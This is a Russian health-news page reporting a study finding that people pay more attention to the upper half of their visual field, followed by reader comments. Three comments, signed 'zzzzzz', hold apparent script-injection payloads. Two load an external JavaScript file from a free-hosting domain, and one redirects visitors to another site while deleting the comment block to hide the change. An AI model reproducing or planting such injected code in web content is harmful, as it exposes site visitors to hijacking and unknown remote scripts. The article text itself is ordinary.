Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хотите поразить людей – н...  >>  Хотите поразить людей – не заморачивайтесь о том, что снизу. Люди видят только верх!
 
Обратная связь
 

Хотите поразить людей – не заморачивайтесь о том, что снизу. Люди видят только верх!

Размер шрифта
18 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Хотите произвести приятное первое впечатление? Тогда уделите более пристальное внимание тому, как выглядит верхняя часть вашего тела, ведь, по мнению ученых, именно на нее в первую очередь обратит внимание собеседник.

Хотите поразить людей – не заморачивайтесь о том, что снизу. Люди видят только верх!

Люди склонны уделять больше внимания верхней половине своего поля зрения. К такому выводу пришли ученые из Университета Северной Каролины и Университета Торонто. Эти данные могут оказать значительное влияние на многие окружающие нас вещи – от дорожных знаков и до компьютерных программ. 

Результаты исследования были опубликованы в журнале i-Perception. «Мы изучали способность людей быстро определять цель среди множества визуальных помех», – рассказывает доктор Джинг Фэнг, профессор психологии из Университета Северной Каролины и ведущий автор работы. «Мы хотели понять, на чем они концентрируют свое внимание в первую очередь».

Ученые просили участников эксперимента зафиксировать взгляд на центре экрана компьютера, на котором на 10-80 миллисекунд появлялся определенный объект и несколько отвлекающих символов. Затем на экране появлялось другое, «маскирующее» изображение, для того, чтобы нарушить ход мыслей участников. Впоследствии каждого просили указать, где именно на экране располагался объект. Ученые выяснили, что, если объект располагался в верхней части экрана, то его положение правильно указывали на 7% чаще. «Это вовсе не значит, что люди не замечают того, что находится в нижней части поля зрения, однако верхней половине явно уделяется большее внимание», – отмечает Фэнг.

«Разница в семь процентов имеет существенное значение для технологий, которыми мы пользуемся регулярно или от которых зависит наша безопасность», – добавляет Фэнг. «К примеру, это может повлиять на размещение дорожных знаков или наиболее важной для пользователя информации на сайтах».

Таким образом, благодаря открытию этой интересной особенности нашего внимания, повседневная жизнь может стать еще более безопасной и удобной.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

18 ноября 2014 в 10:30

Цитировать   |   Пожаловаться

Поэтому Юраша всем предлагает раздеться  до пояса, то, что ниже- ему не  интересно.

А напрасно, знаю мнение многих мужчин- они смотрят именно на ноги и на то, что надето на эти ноги.

2 - Гость

24 июня 2015 в 23:45

Цитировать   |   Пожаловаться

his shadow 18 ноября 2014 в 10:30
что ниже- ему не  интересно.
улыбнуло ))))   

3 - Гость

24 июня 2015 в 23:47

Цитировать   |   Пожаловаться

а про душу забыли....

4 - Гость

24 июня 2015 в 23:54

Цитировать   |   Пожаловаться

а про душу забыли....

5 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 22:25

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как понять, что у вашего ребенка проблемы со зрением   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.